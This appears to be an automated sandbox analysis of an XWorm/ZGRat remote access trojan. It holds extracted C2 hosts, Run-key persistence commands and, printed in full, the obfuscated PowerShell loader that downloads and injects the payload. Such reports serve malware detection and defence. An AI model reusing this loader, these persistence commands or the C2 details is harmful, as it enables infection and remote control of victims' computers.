xworm | 9d28016366915abcb761788b5945736bc06d48a52d7f4199ebe3ad37fca7a5ca

Analysis

max time kernel
143s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S949757965.vbs
Size

300.0MB
MD5

7d69463758d7daa176c7f0c2d7464b79
SHA1

529d7c798fa96e8c78aad637f772812a7d9f6e85
SHA256

28ea2a2652f1b206fa2c11b1f264fc3f0fdf60f45f21d3ba3ff9d50b7e118275
SHA512

e3cc81bdffe7245af8ef23b104c17259d05f08922cb1aa9b501e1da254451379bae244fef7e1e91f980c5552297f181fd03ddce76beb255df3f26172f3b4b6d4
SSDEEP

1536:zJF8FNK7mlIDCH6kN5cUh3Ooo7AhS+cYFQL4VrTflEiTGn:zM4CICHzXF3Oo/hSCegrrHGn

Score

10^/10

xworm zgrat persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

xw9402may.duckdns.org:9402

xwormay9090.duckdns.org:9090

Mutex

5w6Cp63r66k4Jxsj

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3472-50-0x0000000000800000-0x000000000080E000-memory.dmp	family_xworm
behavioral2/memory/3064-138-0x0000000000EA0000-0x0000000000EAE000-memory.dmp	family_xworm

Detect ZGRat V1 25 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4072-152-0x00000000252D0000-0x00000000253AC000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-154-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-198-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-196-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-194-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-192-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-188-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-186-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-184-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-182-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-180-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-178-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-176-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-174-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-172-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-170-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-166-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-164-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-162-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-160-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-159-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-156-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-153-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-190-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1
behavioral2/memory/4072-168-0x00000000252D0000-0x00000000253A7000-memory.dmp	family_zgrat_v1

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

22 5080 powershell.exe
71 1784 powershell.exe
73 1784 powershell.exe
75 1784 powershell.exe
79 1784 powershell.exe
83 4148 powershell.exe

flow	pid	process
22	5080	powershell.exe
71	1784	powershell.exe
73	1784	powershell.exe
75	1784	powershell.exe
79	1784	powershell.exe
83	4148	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\\Leadenpated\\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hjrecentrere = "%Ibsenism% -w 1 $Fdrenegaarde=(Get-ItemProperty -Path 'HKCU:\\Latherability\\').Perdit;%Ibsenism% ($Fdrenegaarde)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs

Processes:

wab.exewab.exewab.exe

pid process

3472 wab.exe
3064 wab.exe
4072 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

powershell.exewab.exepowershell.exepowershell.exewab.exewab.exe

pid process

4844 powershell.exe
3472 wab.exe
4560 powershell.exe
3860 powershell.exe
3064 wab.exe
4072 wab.exe

pid	process
3472	wab.exe
3064	wab.exe
4072	wab.exe

pid	process
4844	powershell.exe
3472	wab.exe
4560	powershell.exe
3860	powershell.exe
3064	wab.exe
4072	wab.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4844 set thread context of 3472	4844	powershell.exe	wab.exe
PID 4560 set thread context of 4072	4560	powershell.exe	wab.exe
PID 3860 set thread context of 3064	3860	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

wab.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings wab.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4680 reg.exe
3772 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	wab.exe

pid	process
4680	reg.exe
3772	reg.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exe

pid	process
5080	powershell.exe
5080	powershell.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
3472	wab.exe
1784	powershell.exe
1784	powershell.exe
4148	powershell.exe
4148	powershell.exe
4560	powershell.exe
4560	powershell.exe
3860	powershell.exe
3860	powershell.exe
4560	powershell.exe
3860	powershell.exe
3064	wab.exe
3064	wab.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4844 powershell.exe
4560 powershell.exe
3860 powershell.exe

pid	process
4844	powershell.exe
4560	powershell.exe
3860	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exewab.exe

description	pid	process
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	3472	wab.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	4072	wab.exe
Token: SeDebugPrivilege	3064	wab.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

wab.exewab.exe

pid process

3472 wab.exe
3064 wab.exe

pid	process
3472	wab.exe
3064	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exeWScript.exepowershell.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 2136 wrote to memory of 5080	2136	WScript.exe	powershell.exe
PID 2136 wrote to memory of 5080	2136	WScript.exe	powershell.exe
PID 5080 wrote to memory of 3180	5080	powershell.exe	cmd.exe
PID 5080 wrote to memory of 3180	5080	powershell.exe	cmd.exe
PID 5080 wrote to memory of 4844	5080	powershell.exe	powershell.exe
PID 5080 wrote to memory of 4844	5080	powershell.exe	powershell.exe
PID 5080 wrote to memory of 4844	5080	powershell.exe	powershell.exe
PID 4844 wrote to memory of 2680	4844	powershell.exe	cmd.exe
PID 4844 wrote to memory of 2680	4844	powershell.exe	cmd.exe
PID 4844 wrote to memory of 2680	4844	powershell.exe	cmd.exe
PID 4844 wrote to memory of 3472	4844	powershell.exe	wab.exe
PID 4844 wrote to memory of 3472	4844	powershell.exe	wab.exe
PID 4844 wrote to memory of 3472	4844	powershell.exe	wab.exe
PID 4844 wrote to memory of 3472	4844	powershell.exe	wab.exe
PID 4844 wrote to memory of 3472	4844	powershell.exe	wab.exe
PID 3472 wrote to memory of 3984	3472	wab.exe	cmd.exe
PID 3472 wrote to memory of 3984	3472	wab.exe	cmd.exe
PID 3472 wrote to memory of 3984	3472	wab.exe	cmd.exe
PID 3984 wrote to memory of 4680	3984	cmd.exe	reg.exe
PID 3984 wrote to memory of 4680	3984	cmd.exe	reg.exe
PID 3984 wrote to memory of 4680	3984	cmd.exe	reg.exe
PID 3472 wrote to memory of 1764	3472	wab.exe	WScript.exe
PID 3472 wrote to memory of 1764	3472	wab.exe	WScript.exe
PID 3472 wrote to memory of 1764	3472	wab.exe	WScript.exe
PID 3472 wrote to memory of 4264	3472	wab.exe	WScript.exe
PID 3472 wrote to memory of 4264	3472	wab.exe	WScript.exe
PID 3472 wrote to memory of 4264	3472	wab.exe	WScript.exe
PID 1764 wrote to memory of 1784	1764	WScript.exe	powershell.exe
PID 1764 wrote to memory of 1784	1764	WScript.exe	powershell.exe
PID 1764 wrote to memory of 1784	1764	WScript.exe	powershell.exe
PID 1784 wrote to memory of 3532	1784	powershell.exe	cmd.exe
PID 1784 wrote to memory of 3532	1784	powershell.exe	cmd.exe
PID 1784 wrote to memory of 3532	1784	powershell.exe	cmd.exe
PID 4264 wrote to memory of 4148	4264	WScript.exe	powershell.exe
PID 4264 wrote to memory of 4148	4264	WScript.exe	powershell.exe
PID 4264 wrote to memory of 4148	4264	WScript.exe	powershell.exe
PID 4148 wrote to memory of 1528	4148	powershell.exe	cmd.exe
PID 4148 wrote to memory of 1528	4148	powershell.exe	cmd.exe
PID 4148 wrote to memory of 1528	4148	powershell.exe	cmd.exe
PID 1784 wrote to memory of 4560	1784	powershell.exe	powershell.exe
PID 1784 wrote to memory of 4560	1784	powershell.exe	powershell.exe
PID 1784 wrote to memory of 4560	1784	powershell.exe	powershell.exe
PID 4560 wrote to memory of 876	4560	powershell.exe	cmd.exe
PID 4560 wrote to memory of 876	4560	powershell.exe	cmd.exe
PID 4560 wrote to memory of 876	4560	powershell.exe	cmd.exe
PID 4148 wrote to memory of 3860	4148	powershell.exe	powershell.exe
PID 4148 wrote to memory of 3860	4148	powershell.exe	powershell.exe
PID 4148 wrote to memory of 3860	4148	powershell.exe	powershell.exe
PID 3860 wrote to memory of 1864	3860	powershell.exe	cmd.exe
PID 3860 wrote to memory of 1864	3860	powershell.exe	cmd.exe
PID 3860 wrote to memory of 1864	3860	powershell.exe	cmd.exe
PID 4560 wrote to memory of 4072	4560	powershell.exe	wab.exe
PID 4560 wrote to memory of 4072	4560	powershell.exe	wab.exe
PID 4560 wrote to memory of 4072	4560	powershell.exe	wab.exe
PID 4560 wrote to memory of 4072	4560	powershell.exe	wab.exe
PID 4560 wrote to memory of 4072	4560	powershell.exe	wab.exe
PID 3860 wrote to memory of 3064	3860	powershell.exe	wab.exe
PID 3860 wrote to memory of 3064	3860	powershell.exe	wab.exe
PID 3860 wrote to memory of 3064	3860	powershell.exe	wab.exe
PID 3860 wrote to memory of 3064	3860	powershell.exe	wab.exe
PID 3860 wrote to memory of 3064	3860	powershell.exe	wab.exe
PID 3064 wrote to memory of 1052	3064	wab.exe	cmd.exe
PID 3064 wrote to memory of 1052	3064	wab.exe	cmd.exe
PID 3064 wrote to memory of 1052	3064	wab.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\S949757965.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Komtessesnstills = 1;$Kommunismes='Su';$Kommunismes+='bstrin';$Kommunismes+='g';Function Toxicarol($redeemable){$Monarkisternes=$redeemable.Length-$Komtessesnstills;For($Komtesses=5;$Komtesses -lt $Monarkisternes;$Komtesses+=6){$Isblokkene+=$redeemable.$Kommunismes.Invoke( $Komtesses, $Komtessesnstills);}$Isblokkene;}function Everlastingness($Forstrkende){& ($Surmenage) ($Forstrkende);}$Aktivest=Toxicarol 'Vas uM c,mioRelatz.largi Beccl autlMed.iaTract/Econo5Overd.Flage0 Silk Heste(,vitiWForu,i CitrnSopord rackoM,lodwSenn sForvi StammNunintT Prig Mekan1 Nedb0lnniv.A.phi0Landb;Ribos HelioWNoneqiE.silnIndka6 Vold4 Po,v;Karto LnenexW.rsz6 Vege4Dow,o;Bolig Stadhr Poinv oler:Metap1embal2 Geof1Predi.Coffi0Knirk)Lsepu ClutGUnecleDgnrycBrea.kT.lepoHudde/ pred2Taber0Marke1.lood0F,sen0 Deak1sygem0Salre1Strow BolthFAlderi,nsucrSl ppeLoqsefDile,ononfaxNeopl/Entit1Ho.po2 Se i1Sprin.Deser0Hangm ';$Lozenger=Toxicarol ' onrhUInadksAffrieTrisur No,a-Prec ASelskgCompieVand,n Fo,ltKompl ';$Reembraced=Toxicarol 'TrykkhOveratVestatLuedep Si.nsSyg.d: Eng./blath/Gu,bujEin toScrubcSaalscAcrotuFledgpMote aHexamtFor.oiS.emsoTerrin,armoa,oundlBran.s TyfocBerl iStrukeChem,n PulvcUpgrae Acet. ,erooContarskr.agF ame/Seisod Husef Gero/ MarkKMilito Mar gStarneBramsk V riuSpildn StelsTe retFejlbe CollrCop l.O,cilxTe.nasSmaasnContr ';$Balser=Toxicarol 'Spatc>Perma ';$Surmenage=Toxicarol 'IndgaiHu kieGawaixLgebe ';$Udtyndingszoner='Blgemekanikkernes';Everlastingness (Toxicarol ' opulSBran.e Be,ztArmig-DesmeCRigoroBreadnReembtWashheBa,tinknocktFarno Hysso-HverdPRundea,itertParolhUdfrd lftebTForeb:Erl g\Sur sTFunklaKap,ncI.truhPrisfoDiskfgRygrar KyklaC ntim.mkra.Le,sitDokumxRotertFyrf Rosma-Tan iVPanmiaRoll lPerniuAssegeTenon Rebel$ GlidU EkspdIntrotTekstyRidden Tid dFirmaiAffrinSkjulgLapi sDeterzForm.o nconn Flute ngorrdrags; .ets ');Everlastingness (Toxicarol 'TornyiYmcaafcrema Myric(Mildrt Bonee StrisGalactHemo - UmbrpLooneaCottatPreach Fu,n UopsiTMe ol:Ov.rs\S,andT.ooksaAfbryc,ammehRaftsoUmoragS olir PropaRamlemPushe.TorskteksprxPhysitBebat)Scint{StraweFiercxHydroiStarettick }Broka; utla ');$Knalleristens = Toxicarol 'RevisePret,cBlan hBaciloColli okku%DrachaBlancpLantepIsochdUdkomaAvanct,ecreaKbetv%Fremt\Ekst.D ,nheeDairid LadldEx,ncyBuild.NotchDLimico L,rigNig.r .nkha&Ableg&Jussi NondeAuthoc He,nhHimmeosa,gf Vrede$Boili ';Everlastingness (Toxicarol 'Pramd$CoquegSa.relRangfoKonfebN tteaSanktlN,cro:Kun,eSSign.t Treeo RecirRectilMe,taiData nLeuciiRespieSwimmtPsych=Bajon( Ma lcudbudmEmascdIlten Trnin/BummlcSuper Con $SouthK CooknBu.keaBl,kblSuccolSkideetapperEld eiFeazis ne ttResere Unesn TestsTenon) Blin ');Everlastingness (Toxicarol 'Doppe$bill gAkenolUnruioHolomb.heliaQui cl Udpo:blomkFUnriplGte kkLseglkconsteProl rGri,dnEthoxeCalen9Na.sk0Trenc=organ$ OffsR OvereHkkeoe .orhm spidb,lumpr ,melaBughocYder eDrejedIndop.Ph,nosBac,ep VerdlMon hi,anictDegne( Regi$fordlBAlfeda ReuplU,anasConopeSno.arKlage)Barbe ');$Reembraced=$Flkkerne90[0];Everlastingness (Toxicarol 'Tomle$UnstugMasselByplaoReprybP.oceaBe.allBo,bl:TypisXcut,vaBack.nRh.tatU,inth,ustsi SkinpAfru pStorteEra irSpytknViruleDenats oode=Te,reNAiluretem owStrin- AuroOSadisbNeurojInt,reCiv.lcHund t Magi BinfuS .usty MonosRodtetEndote Kom,mPrang.StnskNOutwieHammet Krys.fo,anW UdtyeRe,libRagliCArgenlAp.eli S.rieAp.rsnShowmtCy,nu ');Everlastingness (Toxicarol 'Udsej$SemirXal uva ousenSkabetBeatlh RetsipanthpFilstpResu eMac orRet,inEscale Capas Sven.MahjoHAlb cevend,aSikkedSkamseEnocyrAlle sSin,e[Montm$svmm,LmicrooChrisz Kap.eForudn s sogArb,je.atherfireo]Anapn=.xcen$.loamAbrugekUd,rit Ekspi.negivCam se H.lssDorsotUneve ');$Delflgens=Toxicarol 'undesXQurtiaOpdelnHespetInvalhpastoiEnergpDaarepStraneInhomrSti nnGan.eeFidelsA.hol.HenlgDSund,o u,arwRabien Overlriseno Mo eaDih,ddWort,FPolytiGaslol PacoeCover(E,ter$ ygnRPerspeTrevleNonnamReglebCh.tir Upsta,rettc rogre Antid Solo,Svejs$.subaB H,rnaLimonbResiseAsymtrDiassyRough) Over ';$Delflgens=$Storliniet[1]+$Delflgens;$Babery=$Storliniet[0];Everlastingness (Toxicarol 'An.gn$FnomegDokumlAalegoDown,bDagtiaHockelAtmos:PlasmDAut eiCrenacB,stihBlinkr TrstoMu chmatomiaP rcetMis.riTetracOssic=Coeta( AbonTHipsheklicksTranstunde,- ApogP,ippla SedutUligeh.ndtg Spids$AnalyBNitteagavekbHoodweLo,kirFacilyRaunc)Decor ');while (!$Dichromatic) {Everlastingness (Toxicarol 'Varia$BentogautoslDiadeo Ski bInc,ma Nonpl Joce: Sah.bbrandaammonaFlaglnTaxeadPolitvDuettvNewsreSatisnPylor=Theol$GeledtefterrProveuIngele ,jty ') ;Everlastingness $Delflgens;Everlastingness (Toxicarol 'VicarSCota,tErhveaAngrerbaktettiara-FyrtjS Counl ,leceAnb,feTrymap Acin T,ldb4Erthe ');Everlastingness (Toxicarol 'Ustil$ Tredg sildlTransod.skobSq.amaMydi,lPremu:Fe.skDSka,tiGasmaccassohS irirReleno pgramDesmoaIm,retS.periLy.rrcNonco= Krte(,rdsaTSprineDolces RetutBonm -InviaP LauraHarmatIlli,hSekit T.ion$ RoseBVintaaFlywhbOut.ie UralrLeaksyPanda)V.kar ') ;Everlastingness (Toxicarol 'den,i$,oublgFrperlplastoMu enb SmldamalcolSvige: Buk BTumbleVaticsPrdikkoutgayChartlEumerdMakken.mklaiSidevnIntelgPlaste Teutrunapp= With$VisaggOm.krlformyoTroldb auctaSolbrl,ryds: Ran,RHavn,a.lovnjTndstaObs,rb F ll+Orato+ Rati% Kula$Joks F A,yslGeni,k Rawlk pideBinokr C.ncnO.taee Unto9P.lar0Catal.RntgecKingboSandhuTeamwnAfkrvtAutog ') ;$Reembraced=$Flkkerne90[$Beskyldninger];}$Fortrdeligt=276508;$Elzevir=28490;Everlastingness (Toxicarol 'Skal.$ForhagReserl Bri oJeho,bBayadaFastflVgtfy:IngelDSuperi U.povAdveriIncons MilliThromoBetalnNa ursscamms ortytIrrenylib,lkF.arekpaarreA.klarRaffi Arc d=Cours LettiGUdskeeParamtReser-pre.sC Pr doBetonnNyctat.lideeLeuk,nSwit.tT,ien Fedt,$ virkBAlodiaGennebCrysteSp tnrHvledy C,sp ');Everlastingness (Toxicarol 'guine$Bortgg,drjelFernbo BvrebMdeafaBist,lU tra: PikaAM crot carbr Unr,oMorarpRee baEskadl Lngd G.ne=Gnocc Rais[OccipSEu,ogyGenn.sTra stSp nseOdourmBegyn. PorgCcunoioErg tnun nivUtraqe t.llr U,antCo,fi]Skatt:Baiss:M,ndaF.dofirkioskoBegynmSafiaB E shaTrawlsMal,tesuccu6 Disp4Lux mSNoctut .onorAnkeriRuskenPorthgCuvie(Riegg$AnhunD Filli Ratlv Metri,ackjsrhodoiSa,ono BekvnSup.rsDinossProc.tNonpeyMo,stkPs,rikKhedieEnounrM.net)impr. ');Everlastingness (Toxicarol 'Is,cy$,ispagMagmalPiacuoEmendbAutoeaBenvalPlopp:FlnsnFunderdAfstuesupervBarnaaDoctorPy.tee FurfgUnnomiRelapgLiteraSgninn strit.rodueNummen N.ndsBehnd Forz.=Ansva Hydr.[Su.erSGrabbyEntoms En etdupl e,ozjim Quin.SmagsTBebopeByggexBedmmtOligu.HelleE F.benTurnecAbciso ketcdAmy,oiSubwanEksorgAngos]Plott:Ende.: TerrABar,eSAb,ecC EvapIAmanuI Bore.DenerGG.likeSinditBe geSNedkrt Cr srRebooiDatasnto.chgFr mm(Conti$Stud.ATullit orserNaaleokit,bpU,veraZinkklFrste) Nota ');Everlastingness (Toxicarol 'Absci$ByplagKate.lLogaro Barib unloaMensalEnkel:,estiDSoleneMonisw .ammcOrakzlTentiaTi,uswDesc sJackw=H,sto$BestrFB,urpdBlindeDiplov Che.a skibrKoftee,odskg BygaiFormagTosidaNeddynDesigtAfgifeAfhjen placsKostu. EpicsSat uuVivipbEgenasVolustBlodkrVocabiDisv,n salagNonpu(Nidor$ValinFStbeno gemirS multBlastr.rimid .isseLandsl.unnii Sinkgs.vtjtPostt, Nons$Cinc,E Bridl te.rzC.arlebe.davba.thiInconr T.rn)coffi ');Everlastingness $Dewclaws;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Deddy.Dog && echo $"
3⤵
PID:3180

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Komtessesnstills = 1;$Kommunismes='Su';$Kommunismes+='bstrin';$Kommunismes+='g';Function Toxicarol($redeemable){$Monarkisternes=$redeemable.Length-$Komtessesnstills;For($Komtesses=5;$Komtesses -lt $Monarkisternes;$Komtesses+=6){$Isblokkene+=$redeemable.$Kommunismes.Invoke( $Komtesses, $Komtessesnstills);}$Isblokkene;}function Everlastingness($Forstrkende){& ($Surmenage) ($Forstrkende);}$Aktivest=Toxicarol 'Vas uM c,mioRelatz.largi Beccl autlMed.iaTract/Econo5Overd.Flage0 Silk Heste(,vitiWForu,i CitrnSopord rackoM,lodwSenn sForvi StammNunintT Prig Mekan1 Nedb0lnniv.A.phi0Landb;Ribos HelioWNoneqiE.silnIndka6 Vold4 Po,v;Karto LnenexW.rsz6 Vege4Dow,o;Bolig Stadhr Poinv oler:Metap1embal2 Geof1Predi.Coffi0Knirk)Lsepu ClutGUnecleDgnrycBrea.kT.lepoHudde/ pred2Taber0Marke1.lood0F,sen0 Deak1sygem0Salre1Strow BolthFAlderi,nsucrSl ppeLoqsefDile,ononfaxNeopl/Entit1Ho.po2 Se i1Sprin.Deser0Hangm ';$Lozenger=Toxicarol ' onrhUInadksAffrieTrisur No,a-Prec ASelskgCompieVand,n Fo,ltKompl ';$Reembraced=Toxicarol 'TrykkhOveratVestatLuedep Si.nsSyg.d: Eng./blath/Gu,bujEin toScrubcSaalscAcrotuFledgpMote aHexamtFor.oiS.emsoTerrin,armoa,oundlBran.s TyfocBerl iStrukeChem,n PulvcUpgrae Acet. ,erooContarskr.agF ame/Seisod Husef Gero/ MarkKMilito Mar gStarneBramsk V riuSpildn StelsTe retFejlbe CollrCop l.O,cilxTe.nasSmaasnContr ';$Balser=Toxicarol 'Spatc>Perma ';$Surmenage=Toxicarol 'IndgaiHu kieGawaixLgebe ';$Udtyndingszoner='Blgemekanikkernes';Everlastingness (Toxicarol ' opulSBran.e Be,ztArmig-DesmeCRigoroBreadnReembtWashheBa,tinknocktFarno Hysso-HverdPRundea,itertParolhUdfrd lftebTForeb:Erl g\Sur sTFunklaKap,ncI.truhPrisfoDiskfgRygrar KyklaC ntim.mkra.Le,sitDokumxRotertFyrf Rosma-Tan iVPanmiaRoll lPerniuAssegeTenon Rebel$ GlidU EkspdIntrotTekstyRidden Tid dFirmaiAffrinSkjulgLapi sDeterzForm.o nconn Flute ngorrdrags; .ets ');Everlastingness (Toxicarol 'TornyiYmcaafcrema Myric(Mildrt Bonee StrisGalactHemo - UmbrpLooneaCottatPreach Fu,n UopsiTMe ol:Ov.rs\S,andT.ooksaAfbryc,ammehRaftsoUmoragS olir PropaRamlemPushe.TorskteksprxPhysitBebat)Scint{StraweFiercxHydroiStarettick }Broka; utla ');$Knalleristens = Toxicarol 'RevisePret,cBlan hBaciloColli okku%DrachaBlancpLantepIsochdUdkomaAvanct,ecreaKbetv%Fremt\Ekst.D ,nheeDairid LadldEx,ncyBuild.NotchDLimico L,rigNig.r .nkha&Ableg&Jussi NondeAuthoc He,nhHimmeosa,gf Vrede$Boili ';Everlastingness (Toxicarol 'Pramd$CoquegSa.relRangfoKonfebN tteaSanktlN,cro:Kun,eSSign.t Treeo RecirRectilMe,taiData nLeuciiRespieSwimmtPsych=Bajon( Ma lcudbudmEmascdIlten Trnin/BummlcSuper Con $SouthK CooknBu.keaBl,kblSuccolSkideetapperEld eiFeazis ne ttResere Unesn TestsTenon) Blin ');Everlastingness (Toxicarol 'Doppe$bill gAkenolUnruioHolomb.heliaQui cl Udpo:blomkFUnriplGte kkLseglkconsteProl rGri,dnEthoxeCalen9Na.sk0Trenc=organ$ OffsR OvereHkkeoe .orhm spidb,lumpr ,melaBughocYder eDrejedIndop.Ph,nosBac,ep VerdlMon hi,anictDegne( Regi$fordlBAlfeda ReuplU,anasConopeSno.arKlage)Barbe ');$Reembraced=$Flkkerne90[0];Everlastingness (Toxicarol 'Tomle$UnstugMasselByplaoReprybP.oceaBe.allBo,bl:TypisXcut,vaBack.nRh.tatU,inth,ustsi SkinpAfru pStorteEra irSpytknViruleDenats oode=Te,reNAiluretem owStrin- AuroOSadisbNeurojInt,reCiv.lcHund t Magi BinfuS .usty MonosRodtetEndote Kom,mPrang.StnskNOutwieHammet Krys.fo,anW UdtyeRe,libRagliCArgenlAp.eli S.rieAp.rsnShowmtCy,nu ');Everlastingness (Toxicarol 'Udsej$SemirXal uva ousenSkabetBeatlh RetsipanthpFilstpResu eMac orRet,inEscale Capas Sven.MahjoHAlb cevend,aSikkedSkamseEnocyrAlle sSin,e[Montm$svmm,LmicrooChrisz Kap.eForudn s sogArb,je.atherfireo]Anapn=.xcen$.loamAbrugekUd,rit Ekspi.negivCam se H.lssDorsotUneve ');$Delflgens=Toxicarol 'undesXQurtiaOpdelnHespetInvalhpastoiEnergpDaarepStraneInhomrSti nnGan.eeFidelsA.hol.HenlgDSund,o u,arwRabien Overlriseno Mo eaDih,ddWort,FPolytiGaslol PacoeCover(E,ter$ ygnRPerspeTrevleNonnamReglebCh.tir Upsta,rettc rogre Antid Solo,Svejs$.subaB H,rnaLimonbResiseAsymtrDiassyRough) Over ';$Delflgens=$Storliniet[1]+$Delflgens;$Babery=$Storliniet[0];Everlastingness (Toxicarol 'An.gn$FnomegDokumlAalegoDown,bDagtiaHockelAtmos:PlasmDAut eiCrenacB,stihBlinkr TrstoMu chmatomiaP rcetMis.riTetracOssic=Coeta( AbonTHipsheklicksTranstunde,- ApogP,ippla SedutUligeh.ndtg Spids$AnalyBNitteagavekbHoodweLo,kirFacilyRaunc)Decor ');while (!$Dichromatic) {Everlastingness (Toxicarol 'Varia$BentogautoslDiadeo Ski bInc,ma Nonpl Joce: Sah.bbrandaammonaFlaglnTaxeadPolitvDuettvNewsreSatisnPylor=Theol$GeledtefterrProveuIngele ,jty ') ;Everlastingness $Delflgens;Everlastingness (Toxicarol 'VicarSCota,tErhveaAngrerbaktettiara-FyrtjS Counl ,leceAnb,feTrymap Acin T,ldb4Erthe ');Everlastingness (Toxicarol 'Ustil$ Tredg sildlTransod.skobSq.amaMydi,lPremu:Fe.skDSka,tiGasmaccassohS irirReleno pgramDesmoaIm,retS.periLy.rrcNonco= 